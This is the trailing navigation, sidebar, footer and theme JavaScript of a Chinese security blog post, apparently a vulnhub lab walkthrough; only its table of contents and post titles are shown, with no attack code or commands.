}</script><div class="share-link copyurl"><div class="share-button" id="post-share-url" title="复制链接" onclick="copyCurrentPageUrl()"><i class="anzhiyufont anzhiyu-icon-link"></i></div></div></div></div></div><div class="post-copyright__notice"><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://hybcx.xyz" target="_blank">hybcx</a>！</span></div></div><div class="post-tools-right"><div class="tag_share"><div class="post-meta__box"><div class="post-meta__box__tag-list"><a class="post-meta__box__tags" href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/"><span class="tags-punctuation"> <i class="anzhiyufont anzhiyu-icon-tag"></i></span>内网靶场<span class="tagsPageCount">2</span></a></div></div></div><div class="post_share"><div class="social-share" data-image="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.cbd.int/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"/><script src="https://cdn.cbd.int/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer="defer"></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/09/23/kioptrix-level-1.2/"><img class="prev-cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="/" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">vulnhub-kioptrix_level 1.2</div></div></a></div><div class="next-post pull-right"><a href="/2023/09/25/windows-ti-quan-xue-xi-er/"><img class="next-cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="/" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">权限提升学习</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="anzhiyufont anzhiyu-icon-thumbs-up fa-fw" style="font-size: 1.5rem; margin-right: 4px"></i><span>喜欢这篇文章的人也看了</span></div><div class="relatedPosts-list"><div><a href="/2023/09/23/kioptrix-level-1.2/" title="vulnhub-kioptrix_level 1.2"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="/" alt="cover"><div class="content is-center"><div class="date"><i class="anzhiyufont anzhiyu-icon-calendar-days fa-fw"></i> 2023-09-23</div><div class="title">vulnhub-kioptrix_level 1.2</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="anzhiyufont anzhiyu-icon-comments"></i><span> 评论</span></div><div class="comment-randomInfo"><a onclick="anzhiyu.addRandomCommentInfo()" href="javascript:void(0)">匿名评论</a><a href="/privacy" style="margin-left: 4px">隐私政策</a></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div><div class="comment-barrage"></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-content"><div class="author-info__sayhi" id="author-info__sayhi" onclick="anzhiyu.changeSayHelloText()"></div><div class="author-info-avatar"><img class="avatar-img" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/><div class="author-status"><img class="g-status" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://bu.dusays.com/2023/08/24/64e6ce9c507bb.png" alt="status"/></div></div><div class="author-info__description"><div style="line-height:1.38;margin:0.6rem 0;text-align:justify;color:rgba(255, 255, 255, 0.8);">这有关于<b style="color:#fff">产品、设计、开发</b>相关的问题和看法，还有<b style="color:#fff">文章翻译</b>和<b style="color:#fff">分享</b>。</div><div style="line-height:1.38;margin:0.6rem 0;text-align:justify;color:rgba(255, 255, 255, 0.8);">相信你可以在这里找到对你有用的<b style="color:#fff">知识</b>和<b style="color:#fff">教程</b>。</div></div><div class="author-info__bottom-group"><a class="author-info__bottom-group-left" href="/about"><h1 class="author-info__name">hybcx</h1><div class="author-info__desc">只需热爱, 未来可期！</div></a><div class="card-info-social-icons is-center"><a class="social-icon faa-parent animated-hover" href="https://github.com/hybchenxing" target="_blank" title="Github"><i class="anzhiyufont anzhiyu-icon-github"></i></a><a class="social-icon faa-parent animated-hover" href="https://space.bilibili.com/1761635300" target="_blank" title="Email"><i class="anzhiyufont anzhiyu-icon-bilibili"></i></a></div></div></div></div><div class="card-widget anzhiyu-right-widget" id="card-wechat" onclick="null"><div id="flip-wrapper"><div id="flip-content"><div class="face" style="background: url(https://bu.dusays.com/2023/01/13/63c02edf44033.png) center center / 100% no-repeat"></div><div class="back face" style="background: url(https://bu.dusays.com/2023/05/13/645fa415e8694.png) center center / 100% no-repeat"></div></div></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-bars"></i><span>文章目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-%E9%9D%B6%E5%9C%BA%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text">0x01 靶场信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">0x02 信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA"><span class="toc-number">2.1.</span> <span class="toc-text">探测存活主机</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.2.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">2.3.</span> <span class="toc-text">web目录扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E7%BD%91%E7%AB%99%E6%8C%87%E7%BA%B9%E6%89%AB%E6%8F%8F"><span class="toc-number">2.4.</span> <span class="toc-text">web网站指纹扫描</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">0x03 漏洞发现及利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81%E7%99%BB%E5%BD%95%E8%8E%B7%E5%8F%96%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF"><span class="toc-number">3.1.</span> <span class="toc-text">万能密码登录获取用户信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mysql-udf-%E6%8F%90%E6%9D%83"><span class="toc-number">3.2.</span> <span class="toc-text">mysql-udf 提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%BE%E5%88%B0flag"><span class="toc-number">3.3.</span> <span class="toc-text">找到flag</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-%E9%9D%B6%E5%9C%BA%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">0x04 靶场总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BAecho%E5%91%BD%E4%BB%A4%E6%8E%A2%E7%B4%A2"><span class="toc-number">4.1.</span> <span class="toc-text">靶场echo命令探索</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nikto%E6%BC%8F%E6%89%AB%E5%88%9D%E8%AF%86"><span class="toc-number">4.2.</span> <span class="toc-text">nikto漏扫初识</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#smb-%E6%9E%9A%E4%B8%BE"><span class="toc-number">4.3.</span> <span class="toc-text">SMB  枚举</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-%E6%96%87%E7%AB%A0%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">0x05 文章总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06-%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-number">6.</span> <span class="toc-text">0x06 参考文章</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-history"></i><span>最近发布</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/08/thm-yun-xing-shi-gui-bi-jian-ce/" title="THM-运行时规避检测">THM-运行时规避检测</a><time datetime="2024-08-08T14:19:16.000Z" title="发表于 2024-08-08 22:19:16">2024-08-08</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/08/thm-bypass-uac/" title="THM-ByPass_UAC">THM-ByPass_UAC</a><time datetime="2024-08-08T07:36:41.000Z" title="发表于 2024-08-08 15:36:41">2024-08-08</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/07/thm-qian-ming-gui-bi/" title="THM-签名规避">THM-签名规避</a><time datetime="2024-08-07T09:11:33.000Z" title="发表于 2024-08-07 17:11:33">2024-08-07</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/05/windows-ti-quan-zong-jie/" title="Windows提权总结">Windows提权总结</a><time datetime="2024-08-05T02:59:37.000Z" title="发表于 2024-08-05 10:59:37">2024-08-05</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/02/thm-dai-ma-hun-yao-yuan-li/" title="THM-代码混淆原理">THM-代码混淆原理</a><time datetime="2024-08-02T01:46:10.000Z" title="发表于 2024-08-02 09:46:10">2024-08-02</time></div></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"></div><div id="footer-bar"><div class="footer-bar-links"><div class="footer-bar-left"><div id="footer-bar-tips"><div class="copyright">&copy;2020 - 2024 By <a class="footer-bar-link" href="/" title="hybcx" target="_blank">hybcx</a></div></div><div id="footer-type-tips"></div></div><div class="footer-bar-right"><a class="footer-bar-link" target="_blank" rel="noopener" href="https://github.com/anzhiyu-c/hexo-theme-anzhiyu" title="主题">主题</a></div></div></div></footer></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="sidebar-site-data site-data is-center"><a href="/archives/" title="archive"><div class="headline">文章</div><div class="length-num">199</div></a><a href="/tags/" title="tag"><div class="headline">标签</div><div class="length-num">23</div></a><a href="/categories/" title="category"><div class="headline">分类</div><div class="length-num">30</div></a></div><span class="sidebar-menu-item-title">功能</span><div class="sidebar-menu-item"><a class="darkmode_switchbutton menu-child" href="javascript:void(0);" title="显示模式"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i><span>显示模式</span></a></div><div class="back-menu-list-groups"><div class="back-menu-list-group"><div class="back-menu-list-title">网页</div><div class="back-menu-list"><a class="back-menu-item" target="_blank" rel="noopener" href="https://blog.anheyu.com/" title="博客"><img class="back-menu-item-icon" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="/img/favicon.ico" alt="博客"/><span class="back-menu-item-text">博客</span></a></div></div><div class="back-menu-list-group"><div class="back-menu-list-title">项目</div><div class="back-menu-list"><a class="back-menu-item" target="_blank" rel="noopener" href="http://yansedaima.com/" title="颜色代码表"><img class="back-menu-item-icon" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://cdn.jsdelivr.net/gh/hybchenxing/blog-images/img/202408121908150.svg" alt="颜色代码表"/><span class="back-menu-item-text">颜色代码表</span></a></div></div></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 文章</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/archives/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-box-archive"></use></svg><span> 隧道</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/categories/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-shapes"></use></svg><span> 分类</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/tags/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-tags"></use></svg><span> 标签</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 友链</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/link/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-link"></use></svg><span> 友人帐</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/fcircle/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-artstation"></use></svg><span> 朋友圈</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 我的</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/music/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-music"></use></svg><span> 音乐馆</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 关于</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/about/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-paper-plane"></use></svg><span> 关于本人</span></a></li><li><a class="site-page child faa-parent animated-hover" href="javascript:toRandomPost()"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-shoe-prints1"></use></svg><span> 随便逛逛</span></a></li></ul></div></div><span class="sidebar-menu-item-title">标签</span><div class="card-tags"><div class="item-headline"></div><div class="card-tag-cloud"><a href="/tags/CTF%E8%B5%9B%E4%BA%8B/" style="font-size: 0.88rem;">CTF赛事<sup>18</sup></a><a href="/tags/CVE/" style="font-size: 0.88rem;">CVE<sup>15</sup></a><a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 0.88rem;">Java反序列化<sup>3</sup></a><a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 0.88rem;">Java基础<sup>1</sup></a><a href="/tags/Linux%E6%8F%90%E6%9D%83/" style="font-size: 0.88rem;">Linux提权<sup>2</sup></a><a href="/tags/MISC/" style="font-size: 0.88rem;">MISC<sup>1</sup></a><a href="/tags/Metasploit/" style="font-size: 0.88rem;">Metasploit<sup>3</sup></a><a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 0.88rem;">PHP代码审计<sup>2</sup></a><a href="/tags/SecBook/" style="font-size: 0.88rem;">SecBook<sup>1</sup></a><a href="/tags/TryHackMe/" style="font-size: 0.88rem;">TryHackMe<sup>36</sup></a><a href="/tags/Windows%E6%8F%90%E6%9D%83/" style="font-size: 0.88rem;">Windows提权<sup>2</sup></a><a href="/tags/reverse%E7%B3%BB%E5%88%97/" style="font-size: 0.88rem;">reverse系列<sup>2</sup></a><a href="/tags/tryhackme/" style="font-size: 0.88rem;">tryhackme<sup>1</sup></a><a href="/tags/web%E6%B8%97%E9%80%8F/" style="font-size: 0.88rem;">web渗透<sup>2</sup></a><a href="/tags/web%E7%9F%A5%E8%AF%86%E6%80%BB%E7%BB%93/" style="font-size: 0.88rem;">web知识总结<sup>2</sup></a><a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 0.88rem;">代码审计<sup>1</sup></a><a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 0.88rem;">内网渗透<sup>3</sup></a><a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" style="font-size: 0.88rem;">内网靶场<sup>2</sup></a><a href="/tags/%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86/" style="font-size: 0.88rem;">基本知识<sup>21</sup></a><a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 0.88rem;">基础知识<sup>1</sup></a><a href="/tags/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/" style="font-size: 0.88rem;">攻防世界<sup>1</sup></a><a href="/tags/%E7%8E%84%E6%9C%BA%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E9%9D%B6%E5%9C%BA/" style="font-size: 0.88rem;">玄机应急响应靶场<sup>1</sup></a><a href="/tags/%E7%BA%A2%E9%98%9F%E6%B8%97%E9%80%8F/" style="font-size: 0.88rem;">红队渗透<sup>1</sup></a></div></div><hr/></div></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="anzhiyufont anzhiyu-icon-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="anzhiyufont anzhiyu-icon-arrows-left-right"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="anzhiyufont anzhiyu-icon-gear"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="anzhiyufont anzhiyu-icon-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="anzhiyufont anzhiyu-icon-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i></button></div></div><div id="nav-music"><a id="nav-music-hoverTips" onclick="anzhiyu.musicToggle()" accesskey="m">播放音乐</a><div id="console-music-bg"></div><meting-js id="8152976493" server="netease" type="playlist" mutex="true" preload="none" theme="var(--anzhiyu-main)" data-lrctype="0" order="random" volume="0.7"></meting-js></div><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="anzhiyufont anzhiyu-icon-xmark"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr/><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div></div><div id="rightMenu"><div class="rightMenu-group rightMenu-small"><div class="rightMenu-item" id="menu-backward"><i class="anzhiyufont anzhiyu-icon-arrow-left"></i></div><div class="rightMenu-item" id="menu-forward"><i class="anzhiyufont anzhiyu-icon-arrow-right"></i></div><div class="rightMenu-item" id="menu-refresh"><i class="anzhiyufont anzhiyu-icon-arrow-rotate-right" style="font-size: 1rem;"></i></div><div class="rightMenu-item" id="menu-top"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i></div></div><div class="rightMenu-group rightMenu-line rightMenuPlugin"><div class="rightMenu-item" id="menu-copytext"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制选中文本</span></div><div class="rightMenu-item" id="menu-pastetext"><i class="anzhiyufont anzhiyu-icon-paste"></i><span>粘贴文本</span></div><a class="rightMenu-item" id="menu-commenttext"><i class="anzhiyufont anzhiyu-icon-comment-medical"></i><span>引用到评论</span></a><div class="rightMenu-item" id="menu-newwindow"><i class="anzhiyufont anzhiyu-icon-window-restore"></i><span>新窗口打开</span></div><div class="rightMenu-item" id="menu-copylink"><i class="anzhiyufont anzhiyu-icon-link"></i><span>复制链接地址</span></div><div class="rightMenu-item" id="menu-copyimg"><i class="anzhiyufont anzhiyu-icon-images"></i><span>复制此图片</span></div><div class="rightMenu-item" id="menu-downloadimg"><i class="anzhiyufont anzhiyu-icon-download"></i><span>下载此图片</span></div><div class="rightMenu-item" id="menu-newwindowimg"><i class="anzhiyufont anzhiyu-icon-window-restore"></i><span>新窗口打开图片</span></div><div class="rightMenu-item" id="menu-search"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span>站内搜索</span></div><div class="rightMenu-item" id="menu-searchBaidu"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span>百度搜索</span></div><div class="rightMenu-item" id="menu-music-toggle"><i class="anzhiyufont anzhiyu-icon-play"></i><span>播放音乐</span></div><div class="rightMenu-item" id="menu-music-back"><i class="anzhiyufont anzhiyu-icon-backward"></i><span>切换到上一首</span></div><div class="rightMenu-item" id="menu-music-forward"><i class="anzhiyufont anzhiyu-icon-forward"></i><span>切换到下一首</span></div><div class="rightMenu-item" id="menu-music-playlist" onclick="window.open(&quot;https://y.qq.com/n/ryqq/playlist/8802438608&quot;, &quot;_blank&quot;);" style="display: none;"><i class="anzhiyufont anzhiyu-icon-radio"></i><span>查看所有歌曲</span></div><div class="rightMenu-item" id="menu-music-copyMusicName"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制歌名</span></div></div><div class="rightMenu-group rightMenu-line rightMenuOther"><a class="rightMenu-item menu-link" id="menu-randomPost"><i class="anzhiyufont anzhiyu-icon-shuffle"></i><span>随便逛逛</span></a><a class="rightMenu-item menu-link" href="/categories/"><i class="anzhiyufont anzhiyu-icon-cube"></i><span>博客分类</span></a><a class="rightMenu-item menu-link" href="/tags/"><i class="anzhiyufont anzhiyu-icon-tags"></i><span>文章标签</span></a></div><div class="rightMenu-group rightMenu-line rightMenuOther"><a class="rightMenu-item" id="menu-copy" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-copy"></i><span>复制地址</span></a><a class="rightMenu-item" id="menu-commentBarrage" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-message"></i><span class="menu-commentBarrage-text">关闭热评</span></a><a class="rightMenu-item" id="menu-darkmode" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i><span class="menu-darkmode-text">深色模式</span></a><a class="rightMenu-item" id="menu-translate" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-language"></i><span>轉為繁體</span></a></div></div><div id="rightmenu-mask"></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.cbd.int/medium-zoom@1.1.0/dist/medium-zoom.min.js"></script><script src="https://cdn.cbd.int/instant.page@5.2.0/instantpage.js" type="module"></script><script src="https://cdn.cbd.int/vanilla-lazyload@17.8.5/dist/lazyload.iife.min.js"></script><script src="https://cdn.cbd.int/node-snackbar@0.1.16/dist/snackbar.min.js"></script><canvas id="universe"></canvas><script async src="https://npm.elemecdn.com/anzhiyu-theme-static@1.0.0/dark/dark.js"></script><script>// 消除控制台打印
var HoldLog = console.log;
console.log = function () {};
let now1 = new Date();
queueMicrotask(() => {
  const Log = function () {
    HoldLog.apply(console, arguments);
  }; //在恢复前输出日志
  const grt = new Date("04/01/2021 00:00:00"); //此处修改你的建站时间或者网站上线时间
  now1.setTime(now1.getTime() + 250);
  const days = (now1 - grt) / 1000 / 60 / 60 / 24;
  const dnum = Math.floor(days);
  const ascll = [
    `欢迎使用安知鱼!`,
    `生活明朗, 万物可爱`,
    `
        
       █████╗ ███╗   ██╗███████╗██╗  ██╗██╗██╗   ██╗██╗   ██╗
      ██╔══██╗████╗  ██║╚══███╔╝██║  ██║██║╚██╗ ██╔╝██║   ██║
      ███████║██╔██╗ ██║  ███╔╝ ███████║██║ ╚████╔╝ ██║   ██║
      ██╔══██║██║╚██╗██║ ███╔╝  ██╔══██║██║  ╚██╔╝  ██║   ██║
      ██║  ██║██║ ╚████║███████╗██║  ██║██║   ██║   ╚██████╔╝
      ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚═╝   ╚═╝    ╚═════╝
        
        `,
    "已上线",
    dnum,
    "天",
    "©2020 By 安知鱼 V1.6.12",
  ];
  const ascll2 = [`NCC2-036`, `调用前置摄像头拍照成功，识别为【小笨蛋】.`, `Photo captured: `, `🤪`];

  setTimeout(
    Log.bind(
      console,
      `\n%c${ascll[0]} %c ${ascll[1]} %c ${ascll[2]} %c${ascll[3]}%c ${ascll[4]}%c ${ascll[5]}\n\n%c ${ascll[6]}\n`,
      "color:#425AEF",
      "",
      "color:#425AEF",
      "color:#425AEF",
      "",
      "color:#425AEF",
      ""
    )
  );
  setTimeout(
    Log.bind(
      console,
      `%c ${ascll2[0]} %c ${ascll2[1]} %c \n${ascll2[2]} %c\n${ascll2[3]}\n`,
      "color:white; background-color:#4fd953",
      "",
      "",
      'background:url("https://npm.elemecdn.com/anzhiyu-blog@1.1.6/img/post/common/tinggge.gif") no-repeat;font-size:450%'
    )
  );

  setTimeout(Log.bind(console, "%c WELCOME %c 你好，小笨蛋.", "color:white; background-color:#4f90d9", ""));

  setTimeout(
    console.warn.bind(
      console,
      "%c ⚡ Powered by 安知鱼 %c 你正在访问 hybcx 的博客.",
      "color:white; background-color:#f0ad4e",
      ""
    )
  );

  setTimeout(Log.bind(console, "%c W23-12 %c 你已打开控制台.", "color:white; background-color:#4f90d9", ""));

  setTimeout(
    console.warn.bind(console, "%c S013-782 %c 你现在正处于监控中.", "color:white; background-color:#d9534f", "")
  );
});</script><script async src="/anzhiyu/random.js"></script><script src="https://cdn.cbd.int/algoliasearch@4.18.0/dist/algoliasearch-lite.umd.js"></script><script src="https://cdn.cbd.int/instantsearch.js@4.60.0/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js"></script><div class="js-pjax"><script>(() => {
  const initValine = () => {
    const valine = new Valine(Object.assign({
      el: '#vcomment',
      appId: '7Sc5uZwcoDwvbgqkpwGKyCpN-gzGzoHsz',
      appKey: 'iEFJUGMm2FY91n9ZG1gdKBSy',
      avatar: 'mp',
      serverURLs: '',
      emojiMaps: "",
      path: window.location.pathname,
      visitor: false
    }, null))
  }

  const loadValine = async () => {
    if (typeof Valine === 'function') initValine()
    else {
      await getScript('https://cdn.cbd.int/valine@1.5.1/dist/Valine.min.js')
      initValine()
    }
  }

  if ('Valine' === 'Valine' || !false) {
    if (false) anzhiyu.loadComment(document.getElementById('vcomment'),loadValine)
    else setTimeout(loadValine, 0)
  } else {
    window.loadOtherComment = loadValine
  }
})()</script><input type="hidden" name="page-type" id="page-type" value="post"></div><script src="https://cdn.cbd.int/blueimp-md5@2.19.0/js/md5.min.js"></script><script>window.addEventListener('load', () => {
  const changeContent = (content) => {
    if (content === '') return content

    content = content.replace(/<img.*?src="(.*?)"?[^\>]+>/ig, '[图片]') // replace image link
    content = content.replace(/<a[^>]+?href=["']?([^"']+)["']?[^>]*>([^<]+)<\/a>/gi, '[链接]') // replace url
    content = content.replace(/<pre><code>.*?<\/pre>/gi, '[代码]') // replace code
    content = content.replace(/<[^>]+>/g,"") // remove html tag

    if (content.length > 150) {
      content = content.substring(0,150) + '...'
    }
    return content
  }

  const getIcon = (icon, mail) => {
    if (icon) return icon
    let defaultIcon = '?d=mp'
    let iconUrl = `https://gravatar.loli.net/avatar/${md5(mail.toLowerCase()) + defaultIcon}`
    return iconUrl
  }

  const generateHtml = array => {
    let result = ''

    if (array.length) {
      for (let i = 0; i < array.length; i++) {
        result += '<div class=\'aside-list-item\'>'

        if (true) {
          const name = 'data-lazy-src'
          result += `<a href='${array[i].url}' class='thumbnail'><img ${name}='${array[i].avatar}' alt='${array[i].nick}'></a>`
        }

        result += `<div class='content'>
        <a class='comment' href='${array[i].url}' title='${array[i].content}'>${array[i].content}</a>
        <div class='name'><span>${array[i].nick} / </span><time datetime="${array[i].date}">${anzhiyu.diffDate(array[i].date, true)}</time></div>
        </div></div>`
      }
    } else {
      result += '没有评论'
    }

    let $dom = document.querySelector('#card-newest-comments .aside-list')
    $dom && ($dom.innerHTML= result)
    window.lazyLoadInstance && window.lazyLoadInstance.update()
    window.pjax && window.pjax.refresh($dom)
  }

  const getComment = () => {
    const serverURL = 'https://7Sc5uZwc.api.lncldglobal.com'

    var settings = {
      "method": "GET",
      "headers": {
        "X-LC-Id": '7Sc5uZwcoDwvbgqkpwGKyCpN-gzGzoHsz',
        "X-LC-Key": 'iEFJUGMm2FY91n9ZG1gdKBSy',
        "Content-Type": "application/json"
      },
    }

    fetch(`${serverURL}/1.1/classes/Comment?limit=6&order=-createdAt`,settings)
      .then(response => response.json())
      .then(data => {
        const valineArray = data.results.map(function (e) {
          return {
            'avatar': getIcon(e.QQAvatar, e.mail),
            'content': changeContent(e.comment),
            'nick': e.nick,
            'url': e.url + '#' + e.objectId,
            'date': e.updatedAt,
          }
        })
        saveToLocal.set('valine-newest-comments', JSON.stringify(valineArray), 10/(60*24))
        generateHtml(valineArray)
      }).catch(e => {
        const $dom = document.querySelector('#card-newest-comments .aside-list')
        $dom.textContent= "无法获取评论，请确认相关配置是否正确"
      }) 
  }

  const newestCommentInit = () => {
    if (document.querySelector('#card-newest-comments .aside-list')) {
      const data = saveToLocal.get('valine-newest-comments')
      if (data) {
